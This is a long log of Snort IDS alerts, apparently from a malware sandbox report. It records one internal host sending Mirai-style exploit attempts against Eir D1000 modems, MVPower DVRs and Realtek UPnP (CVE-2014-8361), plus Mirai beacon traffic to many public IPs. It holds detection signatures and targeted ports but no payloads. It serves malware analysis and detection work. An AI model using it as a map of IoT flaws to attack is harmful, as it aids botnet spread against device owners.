Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51094 -> 99.226.211.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51030 -> 99.226.211.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51106 -> 99.226.211.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51104 -> 99.226.211.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36110 -> 14.92.118.36:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46476 -> 37.27.10.65:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51770 -> 221.144.27.66:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44622 -> 75.219.214.45:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:41278 -> 95.100.83.173:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:56132 -> 95.100.51.221:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:37228 -> 110.87.104.46:52869 |
Source: Traffic | Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.13:37228 -> 110.87.104.46:52869 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:50856 -> 95.101.98.3:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:59740 -> 95.216.37.160:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:36700 -> 95.216.105.45:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:33826 -> 95.217.190.151:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:58902 -> 95.213.136.74:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:57466 -> 80.82.123.206:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47184 -> 82.84.78.17:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40474 -> 80.78.23.244:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:48182 -> 80.210.94.178:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44734 -> 75.219.214.45:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36210 -> 14.92.118.36:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51684 -> 112.178.146.55:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47210 -> 82.84.78.17:7547 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:37282 -> 110.87.104.46:52869 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:40842 -> 112.175.151.211:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51730 -> 112.178.146.55:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:40478 -> 112.185.255.250:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52664 -> 173.32.205.79:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37910 -> 98.171.10.36:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52676 -> 173.32.205.79:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47396 -> 37.147.56.107:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37924 -> 98.171.10.36:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:58990 -> 88.148.20.232:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:48672 -> 119.195.78.99:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46062 -> 118.54.216.175:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36598 -> 115.1.200.246:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47508 -> 37.147.56.107:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45524 -> 125.26.238.176:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:48688 -> 119.195.78.99:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:46082 -> 118.54.216.175:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36616 -> 115.1.200.246:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45542 -> 125.26.238.176:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59106 -> 164.88.126.222:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59704 -> 5.198.249.28:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:41604 -> 5.32.135.173:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:36450 -> 5.182.115.22:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:44076 -> 5.196.94.141:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52742 -> 173.32.205.79:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52748 -> 173.32.205.79:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:41614 -> 164.138.117.63:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45782 -> 5.182.184.220:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35598 -> 164.155.163.34:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:53650 -> 112.214.82.1:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51878 -> 221.144.27.66:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:47526 -> 95.208.95.175:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:46828 -> 95.43.115.5:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:48146 -> 37.72.208.138:52869 |
Source: Traffic | Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.13:48146 -> 37.72.208.138:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.13:48148 -> 37.72.208.138:52869 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58192 -> 74.34.97.151:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35150 -> 67.58.252.193:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41272 -> 75.91.42.109:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44852 -> 184.188.231.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:38736 -> 46.127.66.111:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58200 -> 74.34.97.151:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59238 -> 179.228.217.47:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:35172 -> 67.58.252.193:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41298 -> 75.91.42.109:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:55158 -> 121.177.176.121:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:54336 -> 211.51.157.203:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33310 -> 121.182.53.138:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44864 -> 184.188.231.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50690 -> 71.215.28.68:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52696 -> 85.101.230.75:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:38766 -> 46.127.66.111:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59268 -> 179.228.217.47:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50710 -> 71.215.28.68:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52716 -> 85.101.230.75:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56448 -> 112.164.247.50:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45152 -> 115.16.143.243:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33338 -> 121.182.53.138:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:55192 -> 121.177.176.121:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:54364 -> 211.51.157.203:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47616 -> 14.85.221.137:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43658 -> 34.36.114.48:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43664 -> 34.36.114.48:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47640 -> 14.85.221.137:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33868 -> 164.160.138.42:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:47420 -> 95.153.30.243:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:42540 -> 95.136.53.60:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:43820 -> 95.154.200.88:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47452 -> 37.158.200.182:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42048 -> 121.182.20.188:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:37588 -> 95.142.171.29:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47482 -> 37.158.200.182:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42078 -> 121.182.20.188:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:56534 -> 112.164.247.50:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:45238 -> 115.16.143.243:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40386 -> 99.225.34.43:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:42478 -> 112.78.1.172:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40416 -> 99.225.34.43:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43454 -> 67.0.245.238:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42938 -> 175.235.142.101:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43668 -> 14.95.224.99:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37068 -> 184.2.227.157:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43466 -> 67.0.245.238:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37078 -> 184.2.227.157:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42948 -> 175.235.142.101:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44376 -> 183.127.188.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:44380 -> 183.127.188.32:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:43682 -> 14.95.224.99:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40892 -> 218.156.93.94:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34346 -> 2.22.162.65:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:54462 -> 2.23.109.116:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42148 -> 121.182.20.188:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42234 -> 121.182.20.188:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33376 -> 191.205.167.67:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33414 -> 191.205.167.67:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:45910 -> 112.28.200.48:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:57644 -> 88.212.207.250:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36536 -> 72.191.180.91:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36352 -> 217.43.28.183:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:60618 -> 86.176.23.203:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36550 -> 72.191.180.91:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:36364 -> 217.43.28.183:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:60634 -> 86.176.23.203:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41220 -> 119.217.36.73:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:48392 -> 103.41.18.166:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40898 -> 218.156.93.94:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41234 -> 119.217.36.73:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34764 -> 45.223.177.218:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51900 -> 61.81.205.183:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34778 -> 45.223.177.218:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:51566 -> 195.224.181.234:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:47758 -> 89.191.153.15:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33750 -> 61.221.83.102:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43256 -> 89.42.0.222:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:57520 -> 195.201.231.73:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51922 -> 61.81.205.183:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43990 -> 89.245.206.109:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51968 -> 61.81.205.183:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34162 -> 34.96.66.16:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:50516 -> 95.125.130.208:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:34204 -> 34.96.66.16:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40730 -> 14.53.82.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33336 -> 119.219.139.80:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:45908 -> 112.28.200.48:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57162 -> 121.133.175.75:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:40788 -> 14.53.82.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:33394 -> 119.219.139.80:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:47474 -> 95.217.75.17:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:53090 -> 2.17.50.72:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:57170 -> 121.133.175.75:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50006 -> 89.28.119.200:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41432 -> 5.139.188.169:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:52010 -> 61.81.205.183:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45614 -> 2.21.210.19:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37004 -> 2.18.238.198:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42834 -> 86.139.94.168:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34882 -> 2.20.206.21:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:50072 -> 89.28.119.200:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:41514 -> 5.139.188.169:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58922 -> 221.162.127.157:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:42860 -> 86.139.94.168:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33636 -> 2.21.42.21:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60170 -> 80.209.183.30:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49576 -> 80.209.105.230:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40388 -> 80.192.64.231:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:58970 -> 221.162.127.157:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:38438 -> 46.175.141.161:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33616 -> 2.21.42.21:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:46018 -> 95.216.78.221:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.13:38650 -> 95.158.145.105:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:55492 -> 107.145.203.144:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47528 -> 109.36.18.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39566 -> 14.94.144.40:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59504 -> 115.10.72.87:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39144 -> 110.145.111.193:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:47550 -> 109.36.18.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49178 -> 34.120.101.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:49192 -> 34.120.101.184:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51060 -> 86.170.15.214:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39164 -> 71.209.81.89:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39596 -> 14.94.144.40:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59530 -> 115.10.72.87:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:59534 -> 115.10.72.87:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39176 -> 110.145.111.193:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:51074 -> 86.170.15.214:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:37328 -> 85.98.193.167:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:39188 -> 71.209.81.89:7547 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45756 -> 80.108.88.245:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.13:55514 -> 107.145.203.144:7547 |
